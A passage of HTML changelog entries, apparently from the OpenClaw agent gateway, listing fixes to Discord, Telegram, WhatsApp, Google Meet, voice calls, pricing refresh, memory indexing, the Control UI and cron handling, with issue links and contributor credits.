<p>Discord: preserve attachment and sticker filenames when saving inbound media, so agents can see human-readable file names instead of only UUID-based paths. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4195120978" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59744" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59744/hovercard" href="https://github.com/openclaw/openclaw/issues/59744">#59744</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xela92/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xela92">@xela92</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rockcent/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rockcent">@rockcent</a>.</p>
</li>
<li>
<p>Discord: preserve non-ASCII channel names in session display labels while keeping allowlist matching on the existing ASCII slug contract. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/swjeong9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/swjeong9">@swjeong9</a>.</p>
</li>
<li>
<p>Discord/PluralKit: canonicalize proxied webhook turns to the original Discord message id for inbound dedupe, while preserving the proxy message id for reply routing. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/acgh213/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/acgh213">@acgh213</a>.</p>
</li>
<li>
<p>Discord: only inject thread starter context on the first turn of the effective thread session, so follow-up thread replies do not repeat the starter block. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4047195697" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/41355" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/41355/hovercard" href="https://github.com/openclaw/openclaw/issues/41355">#41355</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4067889287" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44447" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44447/hovercard" href="https://github.com/openclaw/openclaw/issues/44447">#44447</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4067894290" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44449" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44449/hovercard" href="https://github.com/openclaw/openclaw/issues/44449">#44449</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/p3nchan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/p3nchan">@p3nchan</a>.</p>
</li>
<li>
<p>Discord: resolve thread <code>ownerId</code> and <code>parentId</code> from Discord API-style snake_case payload fields, so bot-owned autoThreads do not require unnecessary mentions. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mgh3326/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mgh3326">@mgh3326</a>.</p>
</li>
<li>
<p>Gateway/diagnostics: include a bounded redacted startup error message in stability bundles, so crash-loop reports identify the failing plugin or contract without exposing secrets. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366332404" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75797" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75797/hovercard" href="https://github.com/openclaw/openclaw/issues/75797">#75797</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ymebosma/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ymebosma">@ymebosma</a>.</p>
</li>
<li>
<p>Gateway/pricing: defer optional model pricing catalog refresh until after sidecars and channels reach the ready path, so slow OpenRouter or LiteLLM pricing fetches cannot block Gateway readiness. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348322680" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74128" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74128/hovercard" href="https://github.com/openclaw/openclaw/issues/74128">#74128</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342339751" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73486" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73486/hovercard" href="https://github.com/openclaw/openclaw/pull/73486">#73486</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ctbritt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ctbritt">@ctbritt</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alprclbi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alprclbi">@alprclbi</a>.</p>
</li>
<li>
<p>Gateway/pricing: abort in-flight model pricing catalog fetches when Gateway shutdown stops the refresh loop, and avoid post-stop cache writes or refresh timers. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331072247" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72208" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72208/hovercard" href="https://github.com/openclaw/openclaw/issues/72208">#72208</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rzcq/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rzcq">@rzcq</a>.</p>
</li>
<li>
<p>Codex/app-server: make startup retry cleanup ownership-aware so concurrent Codex lanes cannot close another lane's freshly restarted shared app-server client. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Google Meet/Twilio: report missing dial-in details during setup and explain that Twilio cannot join Meet URLs without a phone dial plan.</p>
</li>
<li>
<p>Google Meet/Twilio: start the phone leg before sending Meet PIN DTMF, delay intro speech until after the post-connect dial sequence, and log each stage so operators can tell Twilio-leg audio from Meet-room audio.</p>
</li>
<li>
<p>Voice Call: accept provider call IDs for gateway speak/continue requests and report ended-call state from history instead of returning a generic "Call not found" for stale calls.</p>
</li>
<li>
<p>Control UI/Talk: allow the OpenAI Realtime WebRTC offer endpoint through the Control UI CSP, configure browser sessions with explicit VAD/transcription input settings, and surface OpenAI realtime error/lifecycle events instead of leaving Talk stuck as live with no diagnostic. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341743461" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73427" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73427/hovercard" href="https://github.com/openclaw/openclaw/issues/73427">#73427</a>.</p>
</li>
<li>
<p>Plugins: clarify config-selected duplicate plugin override diagnostics and document manifest schema updates for bundled-plugin forks. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3894832647" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/8582" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/8582/hovercard" href="https://github.com/openclaw/openclaw/issues/8582">#8582</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sachah/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sachah">@sachah</a>.</p>
</li>
<li>
<p>CLI backends/Claude: make live-session JSONL turn caps bounded and configurable via <code>reliability.outputLimits</code>, raising the default guard for tool-heavy Claude CLI turns while preserving memory limits. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367015166" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75838" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75838/hovercard" href="https://github.com/openclaw/openclaw/issues/75838">#75838</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hcordoba840/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hcordoba840">@hcordoba840</a>.</p>
</li>
<li>
<p>Telegram/DMs: keep incidental <code>message_thread_id</code> reply-with-quote metadata on the flat DM session by default while preserving opt-in DM topic isolation for configured topics, <code>dm.threadReplies</code>, and <code>direct.&lt;chatId&gt;.threadReplies</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368172291" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75975" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75975/hovercard" href="https://github.com/openclaw/openclaw/issues/75975">#75975</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ProjectEvolutionEVE/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ProjectEvolutionEVE">@ProjectEvolutionEVE</a>.</p>
</li>
<li>
<p>Telegram/network: raise outbound text and typing Bot API request guards to 60 seconds, keep low grammY client timeouts from preempting those guards, let higher <code>timeoutSeconds</code> configs extend safe method guards, and retry timed-out typing indicators through the transport fallback without risking duplicate messages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368500963" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76013" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76013/hovercard" href="https://github.com/openclaw/openclaw/issues/76013">#76013</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iaki1206/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iaki1206">@iaki1206</a>.</p>
</li>
<li>
<p>Telegram/native commands: register and clear command menus in both default and group-chat scopes, so <code>/status</code> and plugin commands stay available in forum topics. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347610813" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74032" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74032/hovercard" href="https://github.com/openclaw/openclaw/issues/74032">#74032</a>; updates <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3882532827" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/6457" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/6457/hovercard" href="https://github.com/openclaw/openclaw/pull/6457">#6457</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dae-sun/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dae-sun">@dae-sun</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WouldenShyp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WouldenShyp">@WouldenShyp</a>.</p>
</li>
<li>
<p>Providers/OpenAI: resolve <code>keychain:&lt;service&gt;:&lt;account&gt;</code> <code>OPENAI_API_KEY</code> refs before creating OpenAI Realtime browser sessions or voice bridges, with a bounded cached Keychain lookup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330678787" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72120" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72120/hovercard" href="https://github.com/openclaw/openclaw/issues/72120">#72120</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ctbritt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ctbritt">@ctbritt</a>.</p>
</li>
<li>
<p>Discord/gateway: reconnect when the gateway socket closes while waiting for the shared IDENTIFY concurrency window, instead of silently skipping IDENTIFY and leaving the bot online but unresponsive. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353606299" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74617" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74617/hovercard" href="https://github.com/openclaw/openclaw/issues/74617">#74617</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zeeskdr-ai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zeeskdr-ai">@zeeskdr-ai</a>.</p>
</li>
<li>
<p>Voice Call: add <code>sessionScope: "per-call"</code> for fresh per-call agent memory while preserving the default per-phone caller history. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4072126400" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/45280" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/45280/hovercard" href="https://github.com/openclaw/openclaw/issues/45280">#45280</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pondcountry/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pondcountry">@pondcountry</a>.</p>
</li>
<li>
<p>Music generation: raise too-small tool timeouts to the provider-safe 10-second floor and collapse cascading abort fallback errors into a clearer root-cause summary. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Memory-core/dreaming: include the primary runtime workspace in multi-agent dreaming sweeps without mixing main-agent session transcripts into configured subagent workspaces. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4307075727" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70014" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70014/hovercard" href="https://github.com/openclaw/openclaw/issues/70014">#70014</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ttomiczek/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ttomiczek">@ttomiczek</a>.</p>
</li>
<li>
<p>Control UI: add tab/RPC timing attribution and decouple slow Overview/Cron secondary refreshes so Sessions navigation gets immediate visible feedback. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4235854543" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64004" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64004/hovercard" href="https://github.com/openclaw/openclaw/issues/64004">#64004</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WaMaSeDu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WaMaSeDu">@WaMaSeDu</a>.</p>
</li>
<li>
<p>Memory: retry transient SQLite index file swaps during atomic reindex on Windows, so brief <code>EBUSY</code>, <code>EPERM</code>, or <code>EACCES</code> locks do not fail memory rebuilds. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4237587612" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64187" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64187/hovercard" href="https://github.com/openclaw/openclaw/issues/64187">#64187</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kunpeng-ai-lab/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kunpeng-ai-lab">@kunpeng-ai-lab</a>.</p>
</li>
<li>
<p>Telegram/startup: use the existing <code>getMe</code> request guard for the gateway bot probe instead of a fixed 2.5-second budget, and honor higher <code>timeoutSeconds</code> configs for slow Telegram API paths. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366123141" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75783" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75783/hovercard" href="https://github.com/openclaw/openclaw/issues/75783">#75783</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tankotan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tankotan">@tankotan</a>.</p>
</li>
<li>
<p>Telegram/models: make model picker confirmations say selections are session-scoped and do not change the agent's persistent default. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368057405" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75965" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75965/hovercard" href="https://github.com/openclaw/openclaw/issues/75965">#75965</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sd1114820/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sd1114820">@sd1114820</a>.</p>
</li>
<li>
<p>Control UI/slash commands: keep fallback command metadata on a browser-safe registry path, so provider thinking runtime imports cannot blank the Web UI with <code>process is not defined</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368284321" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75987" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75987/hovercard" href="https://github.com/openclaw/openclaw/issues/75987">#75987</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/novkien/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/novkien">@novkien</a>.</p>
</li>
<li>
<p>Heartbeat/Discord: keep async exec completion events out of the generic <code>System (untrusted)</code> prompt block and let the dedicated exec heartbeat prompt handle them, so Discord no longer receives raw exec failure tails as separate system-style messages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4259713936" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66366" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66366/hovercard" href="https://github.com/openclaw/openclaw/issues/66366">#66366</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Promee-ThaBossHoss/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Promee-ThaBossHoss">@Promee-ThaBossHoss</a>.</p>
</li>
<li>
<p>Channels: strip plain-text MiniMax and XML tool-call scaffolding from shared user-facing reply sanitization, so messaging channels do not deliver raw model tool syntax when a provider emits it as text instead of structured tool calls. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4221535812" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62820" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62820/hovercard" href="https://github.com/openclaw/openclaw/issues/62820">#62820</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/canh0chua/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/canh0chua">@canh0chua</a>.</p>
</li>
<li>
<p>Infer/media: report missing image-understanding and audio-transcription provider configuration for <code>image describe</code>, <code>image describe-many</code>, and <code>audio transcribe</code> instead of blaming the input path when no provider is available. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343347839" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73569" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73569/hovercard" href="https://github.com/openclaw/openclaw/issues/73569">#73569</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343748623" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73593" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73593/hovercard" href="https://github.com/openclaw/openclaw/pull/73593">#73593</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4349938490" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74288" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74288/hovercard" href="https://github.com/openclaw/openclaw/pull/74288">#74288</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352412851" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74495" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74495/hovercard" href="https://github.com/openclaw/openclaw/pull/74495">#74495</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bittoby/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bittoby">@bittoby</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tmimmanuel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tmimmanuel">@tmimmanuel</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Linux2010/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Linux2010">@Linux2010</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vyctorbrzezowski/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vyctorbrzezowski">@vyctorbrzezowski</a>.</p>
</li>
<li>
<p>Docs/health: clarify that session listing surfaces stored conversation rows rather than Discord/channel socket liveness, and point connectivity checks at channel status and health probes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312712740" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70420" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70420/hovercard" href="https://github.com/openclaw/openclaw/issues/70420">#70420</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ashersoutherncities-art/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ashersoutherncities-art">@ashersoutherncities-art</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/martingarramon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/martingarramon">@martingarramon</a>.</p>
</li>
<li>
<p>WhatsApp/Cron: keep DM pairing-store approvals out of implicit cron and heartbeat recipient fallback, so scheduled automation only uses explicit targets, active configured recipients, or configured <code>allowFrom</code> entries. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4215965103" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62339" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62339/hovercard" href="https://github.com/openclaw/openclaw/issues/62339">#62339</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kelvinisly-collab/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kelvinisly-collab">@kelvinisly-collab</a>.</p>
</li>
<li>
<p>Google Meet: keep the agent-facing <code>google_meet</code> tool visible on non-macOS hosts but block local Chrome realtime actions with guidance, so Linux agents can still use transcribe, Twilio, chrome-node, and artifact flows without choosing the macOS-only BlackHole path. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367913692" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75950" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75950/hovercard" href="https://github.com/openclaw/openclaw/issues/75950">#75950</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/actual-software-inc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/actual-software-inc">@actual-software-inc</a>.</p>
</li>
<li>
<p>macOS/settings: keep opening General from rewriting <code>openclaw.json</code> during Tailscale settings hydration, preserving <code>gateway</code>, <code>auth</code>, <code>meta</code>, and <code>wizard</code> until the user changes a setting. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4192663996" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59545" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59545/hovercard" href="https://github.com/openclaw/openclaw/issues/59545">#59545</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Tengdw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Tengdw">@Tengdw</a>.</p>
</li>
<li>
<p>Discord: prioritize interaction callbacks ahead of stale background REST work without polling active REST buckets, validate oversized gateway payloads and member-intent requests before send, and forward explicit component payloads from message actions. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362439940" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75363" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75363/hovercard" href="https://github.com/openclaw/openclaw/pull/75363">#75363</a>)</p>
</li>
<li>
<p>Active Memory: use the configured recall timeout as the blocking prompt-build hook budget by default and move cold-start setup grace behind explicit <code>setupGraceTimeoutMs</code> config, so the plugin no longer silently extends 15000 ms configs to 45000 ms on the main lane. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367042978" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75843" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75843/hovercard" href="https://github.com/openclaw/openclaw/issues/75843">#75843</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vishutdhar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vishutdhar">@vishutdhar</a>.</p>
</li>
<li>
<p>Plugins/web-provider: reuse the active gateway plugin registry for runtime web provider resolution after deriving the same candidate plugin ids as the loader path, avoiding a redundant <code>loadOpenClawPlugins</code> call on every request while preserving origin and scope filters. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363428779" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75513" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75513/hovercard" href="https://github.com/openclaw/openclaw/issues/75513">#75513</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jochen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jochen">@jochen</a>.</p>
</li>
<li>
<p>Crestodian/CLI: exit non-zero when interactive Crestodian is invoked without a TTY, so scripts and CI no longer treat the setup error as success. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344381793" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73646" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73646/hovercard" href="https://github.com/openclaw/openclaw/issues/73646">#73646</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347317157" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73928" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73928/hovercard" href="https://github.com/openclaw/openclaw/pull/73928">#73928</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347801211" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74059" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74059/hovercard" href="https://github.com/openclaw/openclaw/pull/74059">#74059</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bittoby/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bittoby">@bittoby</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/luyao618/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/luyao618">@luyao618</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Linux2010/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Linux2010">@Linux2010</a>.</p>
</li>
<li>
<p>Cron: keep implicit/default isolated cron announce deliveries out of the main session awareness queue, so isolated jobs do not accumulate in the main conversation. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4208027555" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61426" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61426/hovercard" href="https://github.com/openclaw/openclaw/issues/61426">#61426</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lihannon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lihannon">@Lihannon</a>.</p>
</li>
<li>
<p>Subagents: avoid duplicate parent-visible replies when a parent uses <code>sessions_send</code> on its own persistent native subagent session, while preserving announce delivery for async sends. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342979045" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73550" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73550/hovercard" href="https://github.com/openclaw/openclaw/issues/73550">#73550</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sylviazhang2006-design/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sylviazhang2006-design">@sylviazhang2006-design</a>.</p>
</li>
<li>
